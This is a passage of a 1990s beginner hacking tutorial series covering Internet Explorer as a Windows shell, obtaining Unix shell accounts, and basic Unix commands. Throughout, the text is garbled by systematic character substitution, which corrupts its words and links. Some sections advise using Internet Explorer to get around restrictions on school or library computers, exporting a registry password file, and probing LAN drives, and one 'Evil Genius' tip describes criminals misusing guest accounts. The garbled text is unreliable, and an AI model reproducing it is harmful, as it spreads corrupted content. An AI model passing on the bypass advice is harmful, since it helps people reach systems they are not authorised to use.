to trick your friends into thinking their "# bo' has crashed when it really hasn't? #his .rank .rogram can be downloaded from htt.:IIwww&osr&comIinsiderIinsdrcod&htm& ))))))))))))))))))))))))))))))))) ;ou can get .unched in the nose warning: need 1 say more? ))))))))))))))))))))))))))))))))) But by far the deadliest hacking tool that runs on Windows can be downloaded from( guess what? htt.:IIhome&microsoft&com #hat deadly .rogram is 1nternet 3'.lorer %&M& 0nfortunately( this .rogram is e<en better for letting other hackers break into your home com.uter and do stuff like make your home banking .rogram !e&g& Suicken$ transfer your life sa<ings to someone in *fghanistan&

But if you're aren't bra<e enough to run 1nternet 3'.lorer to surf the Web( you can still use it to hack your own com.uter( or other com.uters on your 7*"& ;ou see( 1nternet 3'.lorer is really an alternate Windows shell which o.erates much like the +rogram 6anager and Windows 3'.lorer that come with the Win 9G and Win "# o.erating systems& ;es( from 1nternet 3'.lorer you can run any .rogram on your own com.uter& 4r any .rogram to which you ha<e access on your 7*"& ))))))))))))))))))))))))))))))))))) "ewbie note: * shell is a .rogram that mediates between you and the o.erating system& #he big deal about 1nternet 3'.lorer being a Windows shell is that 6icrosoft ne<er told anyone that it was in fact a shell& #he security .roblems that are .laguing 1nternet 3'.lorer are mostly a conse@uence of it turning out to be a shell& By contrast( the "etsca.e and 6osaic Web browsers are not shells& #hey also are much safer to use& ))))))))))))))))))))))))))))))))))) #o use 1nternet 3'.lorer as a Windows shell( bring it u. =ust like you would if you were going to surf the Web& 8ill the .rogram's attem.t to establish an 1nternet connection ?? we don't want to do anything cra>y( do we? #hen in the s.ace where you would normally ty.e in the 057 you want to surf( instead ty.e in c:& Whoa( look at all those file folders that come u. on the screen& 7ook familiar? 1t's the same stuff your Windows 3'.lorer would show you& "ow for fun( click :+rogram Hiles: then click :*ccessories: then click :6S+aint&: *ll of a sudden 6S+aint is running& "ow .aint your friends who are watching this hack <ery sur.rised& "e't close all that stuff and get back to 1nternet 3'.lorer& /lick on the Windows folder( then click on 5egedit&e'e to start it u.& 3'.ort the .assword file !it's in H83;F/7*SS3SF544#$& 4.en it in Word +ad& 5emember( the ability to control the 5egistry of a ser<er is the key to controlling the network it ser<es& Show this to your ne't door neighbor and tell her that you're going to use 1nternet 3'.lorer to surf her .assword files& 1n a few hours the Secret Ser<ice will be fighting with the HB1 on your front lawn o<er who gets to try to bust you& 48( only kidding here&

So how can you use 1nternet 3'.lorer as a hacking tool? 4ne way is if you are using a com.uter that restricts your ability to run other .rograms on your com.uter or 7*"& "e't time you get frustrated at your school or library com.uter( check to see if it offers 1nternet 3'.lorer& 1f it does( run it and try entering disk dri<e names& While /: is a common dri<e on your home com.uter( on a 7*" you might get results by .utting in 5: or Q: or any other letter of the al.habet& "e't cool hack: try automated .ort surfing from Windows Since there are thousands of .ossible .orts that may be o.en on any com.uter( it could take days to fully e'.lore e<en =ust one com.uter by hand& * good answer to this .roblem is the "et/o. automated .ort surfer( which can be found at htt.:IIwww&netco.&comI& "ow su..ose you want to be able to access the "#HS file system that Windows "# uses from a Win 95 or e<en 24S .latform? #his can be useful if you are wanting to use Win 95 as a .latform to hack an "# system& htt.:IIwww&ntinternals&comIntfsdos&htm offers a .rogram that allows Win 95 and 24S to recogni>e and mount "#HS dri<es for trans.arent access& Hey( we are hardly beginning to e'.lore all the wonderful Windows hacking tools out there& 1t would take megabytes to write e<en one sentence about each and e<ery one of them& But you're a hacker( so you'll en=oy e'.loring do>ens more of these nifty .rograms yourself& Hollowing is a list of sites where you can download lots of free and more or less harmless .rograms that will hel. you in your hacker career: ft.:IIft.&cdrom&com ft.:IIft.&coast&net htt.:IIhert>&n=it&eduIPKeb'g%GG-Item.&html htt.:IIwww&al.world&comIinfinityI<oid?neo&html htt.:IIwww&danworld&comInettools&html htt.:IIwww&eskimo&comI]nw.sIinde'&html htt.:IIwww&geocities&comIsilicon<alleyI.arkI-E,%Ilinks&html htt.:IIwww&ilf&netI#oastI htt.:IIwww&islandnet&comI]cliffmcc htt.:IIwww&simtel&netIsimtel&net htt.:IIwww&su.ernet&netIcwsa..sIcwsa&html htt.:IIwww&trytel&comIhackI htt.:IIwww&tucows&com htt.:IIwww&windows95&comIa..sI

htt.:IIwww-&southwind&netIPKemikerIhack&html G0123 #4 !mostly$ H*5673SS H*/81"G Beginners' Series 9% +art , How to Get a )Good) Shell *ccount 1n this Guide you will learn how to: L tell whether you may already ha<e a 0ni' shell account L get a shell account L log on to your shell account FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF ;ou'<e fi'ed u. your Windows bo' to boot u. with a lurid hacker logo& ;ou'<e renamed :5ecycle Bin: :Hidden Ha'or Secrets&: When you run "etsca.e or 1nternet 3'.lorer( instead of that boring cor.orate logo( you ha<e a full?color animated 6o>illa destroying "ew ;ork /ity& "ow your friends and neighbors are terrified and im.ressed& But in your heart of hearts you know Windows is scorned by elite hackers& ;ou kee. on seeing their hairy e'.loit .rograms and almost e<ery one of them re@uires the 0ni' o.erating system& ;ou reali>e that when it comes to messing with com.uter networks( 0ni' is the most .owerful o.erating system on the .lanet& ;ou ha<e de<elo.ed a burning desire to become one of those 0ni' wi>ards yourself& ;es( you're ready for the ne't ste.& ;ou're ready for a shell account& SH377 *//40"# ))))))))))))))))))))))))))))))))))))))))))))))))))))) "ewbie note: * shell account allows you to use your home com.uter as a terminal on which you can gi<e commands to a com.uter running 0ni'& #he :shell: is the .rogram that translates your keystrokes into 0ni' commands& With the right shell account you can en=oy the use of a far more .owerful workstation than you could e<er dream of affording to own yourself& 1t also is a great ste..ing stone to the day when you will be running some form of 0ni' on your home com.uter& )))))))))))))))))))))))))))))))))))))))))))))))))))))

4nce u.on a time the most common way to get on the 1nternet was through a 0ni' shell account& But nowadays e<erybody and his brother are on the 1nternet& *lmost all these swarms of surfers want =ust two things: the Web( and email& #o get the .retty .ictures of today's Web( the a<erage 1nternet consumer wants a mere +++ !.oint to .oint$ connection account& #hey wouldn't know a 0ni' command if it hit them in the snoot& So nowadays almost the only .eo.le who want shell accounts are us wannabe hackers& #he .roblem is that you used to be able to sim.ly .hone an 1S+( say :1'd like a shell account(: and they would gi<e it to you =ust like that& But nowadays( es.ecially if you sound like a teenage male( you'll run into something like this: 1S+ guy: :;ou want a shell account? What for?: Hacker dude: :0m( well( 1 like 0ni'&: :7ike 0ni'( huh? ;ou're a hacker( aren't you : Slam( 1S+ guy hangs u. on you& So how do you get a shell account? *ctually( it's .ossible you may already ha<e one and not know it& So first we will answer the @uestion( how do you tell whether you may already ha<e a shell account? #hen( if you are certain you don't ha<e one( we'll e'.lore the many ways you can get one( no matter what( from anywhere in the world& How 2o 1 8now Whether 1 *lready Ha<e a Shell *ccount? Hirst you need to get a .rogram running that will connect you to a shell account& #here are two .rograms with Windows 95 that will do this( as well as many other .rograms( some of which are e'cellent and free& Hirst we will show you how to use the Win 95 #elnet .rogram because you already ha<e it and it will always work& But it's a really limited .rogram( so 1 suggest that you use it only if you can't get the Hy.erterminal .rogram to work& ,$ Hind your #elnet .rogram and make a shortcut to it on your deskto.& L 4ne way is to click Start( then +rograms( then Windows 3'.lorer& L When 3'.lorer is running( first resi>e it so it doesn't co<er the entire deskto.& L #hen click #ools( then Hind( then :Hiles or Holders&:

L *sk it to search for :#elnet&: L 1t will show a file labeled /:TwindowsTtelnet !instead of /:T it may ha<e another dri<e$& 5ight click on this file& L #his will bring u. a menu that includes the o.tion :create shortcut&: /lick on :create shortcut: and then drag the shortcut to the deskto. and dro. it& L /lose Windows 3'.lorer& -$ 2e.ending on how your system is configured( there are two ways to connect to the 1nternet& #he easy way is to ski. to ste. three& But if it fails( go back to this ste.& Start u. whate<er .rogram you use to access the 1nternet& 4nce you are connected( minimi>e the .rogram& "ow try ste. three& %$ Bring u. your #elnet .rogram by double clicking on the shortcut you =ust made& L Hirst you need to configure #elnet so it actually is usable& 4n the toolbar click :terminal(: then :.references(: then :fonts&: /hoose :/ourier "ew(: :regular: and D .oint si>e& ;ou do this because if you ha<e too big a font( the #elnet .rogram is shown on the screen so big that the cursor from your shell .rogram can end u. being hidden off the screen& 48( 48( you can .ick other fonts( but make sure that when you close the dialog bo' that the #elnet .rogram window is entirely <isible on the screen& "ow why would there be o.tions that make #elnet im.ossible to use? *sk 6icrosoft& L "ow go back to the task bar to click /onnect( then under it click :5emote system&: #his brings u. another dialog bo'& L 0nder :host name: in this bo' ty.e in the last two .arts of your email address& Hor e'am.le( if your email address is =aneFdoeJboring&1S+&com( ty.e :1S+&com: for host name& L 0nder :.ort: in this bo'( lea<e it the way it is( reading :telnet&: L 0nder :terminal ty.e(: in this bo'( choose :C#,MM&: L #hen click the /onnect button and wait to see what ha..ens& L 1f the connection fails( try entering the last three .arts of your email address as the host( in this case :boring&1S+&com&: "ow if you ha<e a shell account you should ne't get a message asking you to login& 1t may look something like this: Welcome to Boring 1nternet Ser<ices( 7td& Boring&com S9 ? login: cmeinel +assword: 7inu' -&M&M&

7ast login: #hu *.r ,M ,G:M-:MM on tty.5 from .m-M&kitty&net& slee.y:]O 1f you get something like this you are in definite luck& #he im.ortant thing here( howe<er( is that the com.uter used the word :login: to get you started& 1f is asked for anything else( for e'am.le :logon(: this is not a shell account& *s soon as you login( in the case of Boring 1nternet Ser<ices you ha<e a 0ni' shell .rom.t on your screen& But instead of something this sim.le you may get something like: BS21 BS2I4S -&, !esca.e&com$ !ttyrf$ login: galfina +assword: 7ast login: #hu *.r ,M ,E:,,:%K from fubar&net FFFFFFFFFFFFFFFFFFF FFFFFF FFFFFFFFFFFFFF FFF I FFFI FFFI TI TI FF I FFFI FFFFF I FFFITFF I IFFI I I IFFFI FFFI FFFFFFF I I I I I I I I I I I I FFFFFFFFF TFFFFFITFFFFFITFFFFFITFFIFFFITFI TFFFFFI &com Y 3S/*+3&/46 Z FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFF +73*S3 "4#3: 6ulti.le 7ogins and Simultaneous 2ialu.s Hrom 2ifferent 7ocations *re F"4#F +ermitted at 3sca.e 1nternet *ccess& FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFF 3nter your terminal ty.e( 53#05" for <t,MM( ? for list: Setting terminal ty.e to <t,MM& 3rase is backs.ace&

6*1" 3sca.e 6ain 6enu ????YM5:G5+6Z????????????????????????????????????????????????????? WWV H$ H37+ Hel. N #i.s for the 3sca.e 1nterface& !6$ 1$ 1"#35"3# 1nternet *ccess N 5esources !6$ 0$ 0S3"3#6 0senet /onferences !1nternet 2istribution$ !6$ 7$ 7#*78 3sca.e 7ocal /ommunications /enter !6$ B$ B0773#1"S 1nformation on 3sca.e( 0.grades( coming e<ents& !6$ 6$ 6*17 3sca.e World Wide and 7ocal +ost 4ffice !6$ H$ H463 ;our Home 2irectory !Where all your files end u.$ /$ /4"H1G /onfig your user and system o.tions !6$ S$ SH377 #he Shell !0ni' 3n<ironment$ Y#/SHZ U$ 74G40# 7ea<e System B*/8 6*1" H463 6B4U 1#*78 74G40#

????Y6esg: ;Z????????????Y #*B key toggles menus Z???????Y/onnected: M:MMZ??? /62V 1n this case you aren't in a shell yet( but you can see an o.tion on the menu to get to a shell& So hooray( you are in luck( you ha<e a shell account& Rust enter :S: and you're in& "ow de.ending on the 1S+ you try out( there may be all sorts of different menus( all designed to kee. the user from ha<ing to e<er stumble across the shell itself& But if you ha<e a shell account( you will .robably find the word :shell: somewhere on the menu& 1f you don't get something ob<ious like this( you may ha<e to do the single most humiliating thing a wannabe hacker will e<er do& /all tech su..ort and ask whether you ha<e a shell account and( if so( how to login& 1t may be that they =ust want to make it really( really hard for you to find your shell account& "ow .ersonally 1 don't care for the Win 95 #elnet .rogram& Hortunately there are many other ways to check whether you ha<e a shell account& Here's how to use the Hy.erterminal .rogram( which( like #elnet( comes free with the Windows 95 o.erating system& #his re@uires a different kind of connection& 1nstead of a +++ connection we will do a sim.le .hone dialu.( the same sort of connection you use to get on most com.uter bulletin board systems !BBS$&

,$ Hirst( find the .rogram Hy.erteminal and make a shortcut to your deskto.& #his one is easy to find& Rust click Start( then +rograms( then *ccessories& ;ou'll find Hy.erterminal on the accessories menu& /licking on it will bring u. a window with a bunch of icons& /lick on the one labeled :hy.erterminal&e'e&: -$ #his brings u. a dialog bo' called :"ew /onnection&: 3nter the name of your local dialu.( then in the ne't dialog bo' enter the .hone dialu. number of your 1S+& %$ 6ake a shortcut to your deskto.& G$ 0se Hy.erterminal to dial your 1S+& "ote that in this case you are making a direct .hone call to your shell account rather than trying to reach it through a +++ connection& "ow when you dial your 1S+ from Hy.erterminal you might get a bunch of really weird garbage scrolling down your screen& But don't gi<e u.& What is ha..ening is your 1S+ is trying to set u. a +++ connection with Hy.erterminal& #hat is the kind of connection you need in order to get .retty .ictures on the Web& But Hy.erterminal doesn't understand +++& 0nfortunately 1'<e ha<e not been able to figure out why this ha..ens sometimes or how to sto. it& But the good side of this .icture is that the .roblem may go away the ne't time you use Hy.erterminal to connect to your 1S+& So if you dial again you may get a login se@uence& 1'<e found it often hel.s to wait a few days and try again& 4f course you can com.lain to tech su..ort at your 1S+& But it is likely that they won't ha<e a clue on what causes their end of things to try to set u. a +++ session with your Hy.erterminal connection& Sigh& But if all goes well( you will be able to log in& 1n fact( e'ce.t for the +++ attem.t .roblem( 1 like the Hy.erterminal .rogram much better than Win 95 #elnet& So if you can get this one to work( try it out for awhile& See if you like it( too& #here are a number of other terminal .rograms that are really good for connecting to your shell account& #hey include Smodem( Suarterdeck 1nternet Suite( and Bitcom& Rericho recommends 3wan( a telnet .rogram which also runs on Windows 95& 3wan is free( and has many more features

than either Hy.erterminal or Win 95 #elnet& ;ou may download it from =ericho's ft. site at sekurity&org in the Iutils directory& 48( let's say you ha<e logged into your 1S+ with your fa<orite .rogram& But .erha.s it still isn't clear whether you ha<e a shell account& Here's your ne't test& *t what you ho.e is your shell .rom.t( gi<e the command :ls ?alH&: 1f you ha<e a real( honest?to?goodness shell account( you should get something like this: V ls ?alH total DK drw'??'??' drw'r?'r?' ?rw?r??r?? ?rw?r??r?? ?rw?r??r?? ?rw?r??r?? drw'??'??' etc&

5 galfina user ,M-G *.r -- -,:G5 &I %DM root wheel EE5E *.r -- ,D:,5 &&I , galfina user -K9% *.r -- ,K:%E &53*263 , galfina user E%5 *.r -- ,K:%E &Umodma. , galfina user E-G *.r -- ,K:%E &Umodma.&0S8B2 , galfina user DMD *.r -- ,K:%E &Uresources - galfina user 5,- *.r -- ,K:%E wwwI

#his is the listing of the files and directories of your home directory& ;our shell account may gi<e you a different set of directories and files than this !which is only a .artial listing$& 1n any case( if you see anything that looks e<en a little bit like this( congratulations( you already ha<e a shell account ))))))))))))))))))))))))))))))))))))))))))))))))))))))) "ewbie note: #he first item in that bunch of dashes and letters in front of the file name tells you what kind of file it is& :d: means it is a directory( and :?: means it is a file& #he rest are the .ermissions your files ha<e& :r: W read .ermission( :w: W write .ermission( and :': W e'ecute .ermission !no( :e'ecute: has nothing to do with murdering files( it means you ha<e .ermission to run the .rogram that is in this file$& 1f there is a dash( it means there is no .ermission there& #he symbols in the second( third and fourth .lace from the left are the .ermissions that you ha<e as a user( the following three are the .ermissions e<eryone in your designated grou. has( and the final three are the .ermissions anyone and e<eryone may ha<e& Hor e'am.le( in galfina's directory the subdirectory :wwwI: is something you may read( write and e'ecute( while e<eryone else may only e'ecute& #his is the directory where you can .ut your

Web .age& #he entire world may browse !:e'ecute:$ your Web .age& But only you can read and write to it& 1f you were to someday disco<er your .ermissions looking like: drw'??'rw' newbie user 5,- *.r -- ,K:%E wwwI

Whoa( that :w: in the third .lace from last would mean anyone with an account from outside your 1S+ can hack your Web .age )))))))))))))))))))))))))))))))))))))))))))))))))))))) *nother command that will tell you whether you ha<e a shell account is :man&: #his gi<es you an online 0ni' manual& 0sually you ha<e to gi<e the man command in the form of :man ^commandV: where ^commandV is the name of the 0ni' command you want to study& Hor e'am.le( if you want to know all the different ways to use the :ls: command( ty.e :man ls: at the .rom.t& 4n the other hand( here is an e'am.le of something that( e<en though it is on a 0ni' system( is not a shell account: BS21 BS2I%DE ,&, !dub?gw?-&com.user<e&com$ !tty.K$ /onnected to /om.uSer<e Host "ame: cis 3nter choice !74G4"( H37+( 4HH$: #he immediate ti.?off that this is not a shell account is that it asks you to :logon: instead of :login:: How to Get a Shell *ccount What if you are certain that you don't already ha<e a shell account? How do you find an 1S+ that will gi<e you one?

#he ob<ious .lace to start is your .hone book& 0nless you li<e in a really rural area or in a country where there are few 1S+s( there should be a number of com.anies to choose from& So here's your .roblem& ;ou .hone Boring 1S+( 1nc& and say( :1'd like a shell account&: But Roe 2ummy on the other end of the .hone says( :Shell? What's a shell account?: ;ou say :1 want a shell account& SH377 *//40"# : He says( :2uh?: ;ou say :Shell account& SH377 *//40"# : He says( :0m( er( let me talk to my su.er<isor&: 6r& 0.tight Su.er<isor gets on the .hone& :We don't gi<e out shell accounts( you dirty NPO)9 hacker&: 4r( worse yet( they claim the 1nternet access account they are gi<ing you a shell account but you disco<er it isn't one& #o a<oid this embarrassing scene( a<oid calling big name 1S+s& 1 can guarantee you( *merica 4nline( /om.user<e and 6icrosoft "etwork don't gi<e out shell accounts& What you want to find is the seediest( tiniest 1S+ in town& #he one that s.eciali>es in .asty?faced customers who stay u. all night .laying 644s and 602s& Guys who im.ersonate grrrls on 15/& "ow that is not to say that 602 and 15/ .eo.le are ty.ically hackers& But these definitely are your serious 1nternet addicts& *n 1S+ that caters to .eo.le like that .robably also understands the kind of .erson who wants to learn 0ni' inside and out& So you .hone or email one of these 1S+s on the back roads of the "et and say( :Greetings( dMMd 1 am an e<il ha'or and demand a shell account .ronto : "o( no( no /hances are you got the owner of this tiny 1S+ on the other end of the line& He's .robably a hacker himself& Guess what? He lo<es to hack but he doesn't want hackers !or wannabe hackers$ for customers& He doesn't want a customer who's going to be attracting email bombers and waging hacker war and drawing com.laints from the sysadmins on whom this deadly dude has been testing e'.loit code& So what you do is say something like :Say( do you offer shell accounts? 1 really( really like to browse the Web with lyn'& 1 hate waiting fi<e hours for all those .retty .ictures and Ra<a a..lets to load& *nd 1 like to do email with +ine& Hor newsgrou.s( 1 luuu< tin :

Start out like this and the owner of this tiny 1S+ may say something like( :Wow( dude( 1 know what you mean& 13 and "etsca.e really s))) 7yn' uber alles What user name would you like?: *t this .oint( ask the owner for a guest account& *s you will learn below( some shell accounts are so restricted that they are almost worthless& But let's say you can't find any 1S+ within reach of a local .hone call that will gi<e you a shell account& 4r the only shell account you can get is worthless& 4r you are well known as a malicious hacker and you'<e been kicked off e<ery 1S+ in town& What can you do? ;our best o.tion is to get an account on some distant 1S+( .erha.s e<en in another country& *lso( the few medium si>e 1S+s that offer shell accounts !for e'am.le( "etcom$ may e<en ha<e a local dialu. number for you& But if they don't ha<e local dialu.s( you can still access a shell account located )anywhere) in the world by setting u. a +++ connection with your local dialu. 1S+( and then accessing your shell account using a telnet .rogram on your home com.uter& ))))))))))))))))))))))))))))))))))))))))))))))))) 3<il Genius #i.: Sure( you can telnet into your shell account from another 1S+ account& But unless you ha<e software that allows you to send your .assword in an encry.ted form( someone may sniff your .assword and break into your account& 1f you get to be well known in the hacker world( lots of other hackers will constantly be making fun of you by sniffing your .assword& 0nfortunately( almost all shell accounts are set u. so you must e'.ose your .assword to anyone who has hidden a sniffer anywhere between the 1S+ that .ro<ides your +++ connection and your shell account 1S+& 4ne solution is to insist on a shell account .ro<ider that runs ssh !secure shell$& )))))))))))))))))))))))))))))))))))))))))))))))))) So where can you find these 1S+s that will gi<e you shell accounts? 4ne good source is htt.:IIwww&celestin&comI.ociaI& 1t .ro<ides links to 1nternet Ser<ice +ro<iders categori>ed by geogra.hic region& #hey e<en ha<e links to allow you to sign u. with 1S+s ser<ing the 7esser *ntilles )))))))))))))))))))))))))))))))))))))))))))))))

3<il Genius ti.: /om.uter criminals and malicious hackers will often get a guest account on a distant 1S+ and do their dirty work during the few hours this guest account is a<ailable to them& Since this .ractice .ro<ides the o..ortunity to cause so much harm( e<entually it may become really hard to get a test run on a guest account& ))))))))))))))))))))))))))))))))))))))))))))))) But if you want to find a good shell account the hacker way( here's what you do& Start with a list of your fa<orite hacker Web sites& Hor e'am.le( let's try htt.:IIra&nilenet&comI]m=lIhacksIcode>&htm& ;ou take the beginning .art of the 057 !0niform 5esource 7ocator$ as your starting .oint& 1n this case it is :htt.:IIra&nilenet&com&: #ry surfing to that 057& 1n many cases it will be the home .age for that 1S+& 1t should ha<e instructions for how to sign u. for a shell account& 1n the case of "ile "et we strike hacker gold: 2ial?u. *ccounts and +ricing "3U0S *ccounts "3U0S *ccounts include: *ccess to a 0"1U Shell( full 1nternet access( 0senet newsgrou.s( 5mb of H#+ andIor WWW storage s.ace( and unlimited time& 4ne #ime *cti<ation Hee: O-M&MM 6onthly Ser<ice Hee: O,9&95 or ;early Ser<ice Hee: O,99&95 +lus which they make a big deal o<er freedom of online s.eech& *nd they host a great hacker .age full of these Guides to !mostly$ Harmless Hacking How to 7ogin to ;our Shell *ccount "ow we assume you finally ha<e a guest shell account and are ready to test dri<e it& So now we need to figure out how to login& "ow all you hacker geniuses reading this( why don't you =ust forget to flame me for telling .eo.le how to do something as sim.le as how to login& +lease remember that e<eryone has a first login& 1f you ha<e ne<er used 0ni'( this first time can be intimidating& 1n any case( if you are a 0ni' genius you ha<e no business reading this Beginners' Guide& So if you are snoo.ing around here looking for flamebait( send your flames to Ide<Inull&

))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) "ewbie note: :Hlames: are insulting( obno'ious rantings and ra<ings done by .eo.le who are se<erely lacking in social skills and are a bunch of NOPJ9 but who think they are brilliant com.uter sa<ants& Hor e'am.le( this newbie note is my flame against NOPJ9 flamers& :Ide<Inull: stands for :de<ice null&: 1t is a file name in a 0ni' o.erating system& *ny data that is sent to Ide<Inull is discarded& So when someone says they will .ut something in :Ide<Inull: that means they are sending it into .ermanent obli<ion& ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) #he first thing you need to know in order to get into your shell account is your user name and .assword& ;ou need to get that information from the 1S+ that has =ust signed you u.& #he second thing you need to remember is that 0ni' is :case sensiti<e&: #hat means if your login name is :RoeSchmoe: the shell will think :=oeschmoe: is a different .erson than :RoeSchmoe: or :R43S/H643&: 48( so you ha<e =ust connected to your shell account for the first time& ;ou may see all sorts of different stuff on that first screen& But the one thing you will always see is the .rom.t: login: Here you will ty.e in your user name& 1n res.onse you will always be asked : +assword: Here you ty.e in your .assword& *fter this you will get some sort of a .rom.t& 1t may be a sim.le as: P or O

or V 4r as com.licated as: slee.y:]O 4r it may e<en be some sort of com.licated menu where you ha<e to choose a :shell: o.tion before you get to the shell .rom.t& 4r it may be a sim.le as: 9 )))))))))))))))))))))))))))))))))))))))))))))))))))))))))) "ewbie note: #he .rom.t :9: usually means you ha<e the su.eruser .owers of a :root: account& #he 0ni' su.eruser has the .ower to do )anything) to the com.uter& But you won't see this .rom.t unless either the systems administrator has been really careless ?? or someone is .laying a =oke on you& Sometimes a hacker thinks he or she has broken into the su.eruser account because of seeing the :9: .rom.t& But sometimes this is =ust a trick the sysadmin is .laying& So the hacker goes .laying around in what he or she thinks is the root account while the sysadmin and his friends and the .olice are all laughing at the hacker& )))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 5eady to start hacking from your shell account? Watch out( it may be so cri..led that it is worthless for hacking& 4r( it may be .retty good( but you might inad<ertently do something to get you kicked off& #o a<oid these fates( be sure to read Beginners' Series 9% +art - of How to Get a )Good) Shell *ccount( coming out tomorrow& 1n that G#6HH section you will learn how to: L e'.lore your shell account L decide whether your shell account is any good for hacking L kee. from losing your shell account

1n case you were wondering about all the in.ut from =ericho in this Guide( yes( he was @uite hel.ful in re<iewing it and making suggestions& Rericho is a security consultant runs his own 1nternet host( obscure&sekurity&org& #hank you( =erichoJdimensional&com( and ha..y hacking G0123 #4 !mostly$ H*5673SS H*/81"G Beginners' Series 9% +art How to Get a )Good) Shell *ccount FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 1n this section you will learn: L how to e'.lore your shell account L #en 6einel Hall of Hame Shell *ccount 3'.loration #ools L how to decide whether your shell account is any good for hacking L #en 6einel Hall of Hame 7*" and 1nternet 3'.loration #ools L 6einel Hall of 1nfamy #o. Hi<e Ways to Get 8icked out of ;our Shell *ccount FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF How to 3'.lore ;our Shell *ccount So you're in your shell account& ;ou'<e tried the :ls ?alH: command and are .retty sure this really( truly is a shell account& What do you do ne't? * good .lace to start is to find out what kind of shell you ha<e& #here are many shells( each of which has slightly different ways of working& #o do this( at your .rom.t gi<e the command :echo OSH377&: Be sure to ty.e in the same lower case and u..er case letters& 1f you were to gi<e the command :3/H4 Oshell(: for e'am.le( this command won't work& 1f you get the res.onse: IbinIsh

#hat means you ha<e the Bourne shell& 1f you get: IbinIbash #hen you are in the Bourne *gain !bash$ shell& 1f you get: IbinIksh ;ou ha<e the 8orn shell& 1f the :echo OSH377: command doesn't work( try the command :echo Oshell(: remembering to use lower case for :shell&: #his will likely get you the answer: IbinIcsh #his means you ha<e the / shell& Why is it im.ortant to know which shell you ha<e? Hor right now( you'll want a shell that is easy to use& Hor e'am.le( when you make a mistake in ty.ing( it's nice to hit the backs.ace key and not see BHBHBH on your screen& 7ater( though( for running those su.er hacker e'.loits( the / shell may be better for you& Hortunately( you may not be stuck with whate<er shell you ha<e when you log in& 1f your shell account is any good( you will ha<e a choice of shells& #rust me( if you are a beginner( you will find bash to be the easiest shell to use& ;ou may be able to get the bash shell by sim.ly ty.ing the word :bash: at the .rom.t& 1f this doesn't work( ask tech su..ort at your 1S+ for a shell account set u. to use bash& * great book on using the bash shell is F7earning the Bash ShellF( by /ameron "ewham and Bill 5osenblatt( .ublished by 4'5eilly& 1f you want to find out what other shells you ha<e the right to use( try :csh: to get the / shellA :ksh: to get the 8orn shell( :sh: for Bourne shell( :tcsh: for

the #csh shell( and :>sh: for the Qsh shell& 1f you don't ha<e one of them( when you gi<e the command to get into that shell you will get back the answer :command not found&: "ow that you ha<e chosen your shell( the ne't thing is to e'.lore& See what riches your 1S+ has allowed you to use& Hor that you will want to learn( and 1 mean )really learn) your most im.ortant 0ni' commands and au'iliary .rograms& Because 1 am su.reme arbiter of what goes into these Guides( 1 get to decide what the most im.ortant commands are& Hmm( :ten: sounds like a famous number& So you're going to get the: #en 6einel Hall of Hame Shell *ccount 3'.loration #ools ,$ man ^command nameV #his magic command brings u. the online 0ni' manual& 0se it on each of the commands below( today Wonder what all the man command o.tions are? #ry the :man ?k: o.tion& -$ ls 7ists files& Rericho suggests :Get .eo.le in the habit of using :ls ?alH:& #his will come into .lay down the road for security?conscious users&: ;ou'll see a huge list of files that you can't see with the :ls: command alone( and lots of details& 1f you see such a long list of files that they scroll off the terminal screen( one way to sol<e the .roblem is to use :ls ?alH_more&: %$ .wd Shows what directory you are in& G$ cd ^directoryV /hanges directories& 8ewl directories to check out include Iusr( Ibin and Ietc& Hor laughs( =ericho suggests e'.loring in Itm.& 5$ more ^filenameV #his shows the contents of te't files& *lso you might be able to find :less: and :cat: which are similar commands& E$ whereis ^.rogram nameV #hink there might be a nifty .rogram hidden somewhere? 6aybe a game you lo<e? #his will find it for you& Similar commands are :find: and :locate&: #ry them all for e'tra fun&

K$ <i *n editing .rogram& ;ou'll need it to make your own files and when you start .rogramming while in your shell account& ;ou can use it to write a really lurid file for .eo.le to read when they finger you& 4r try :emacs&: 1t's another editing .rogram and 16H4 more fun than <i& 4ther editing .rograms you may find include :ed: !an ancient editing .rogram which 1 ha<e used to write thousands of lines of Hortran KK code$( :e'(: :fmt(: :gmacs(: :gnuemacs(: and :.ico&: D$ gre. 3'tracts information from files( es.ecially useful for seeing what's in syslog and shell log files& Similar commands are :egre.(: :fgre.(: and :look&: 9$ chmod ^filenameV /hange file .ermissions& ,M$ rm ^filenameV 2elete file& 1f you ha<e this command you should also find :c.: for co.y file( and :m<: for mo<e file& How to #ell Whether ;our Shell *ccount 1s any Good for Hacking *las( not all shell accounts are created e@ual& ;our 1S+ may ha<e decided to cri..le your budding hacker career by forbidding your access to im.ortant tools& But you absolutely must ha<e access to the to. ten tools listed abo<e& 1n addition( you will need tools to e'.lore both your 1S+'s local area network !7*"$ and the 1nternet& So in the s.irit of being Su.reme *rbiter of Ha'or 8ewl( here are my: #en 6einel Hall of Hame 7*" and 1nternet 3'.loration #ools ,$ telnet ^hostnameV ^.ort number or nameV 1f your shell account won't let you telnet into any .ort you want either on its 7*" or the 1nternet( you are totally cri..led as a hacker& 2um. your 1S+ now -$ who

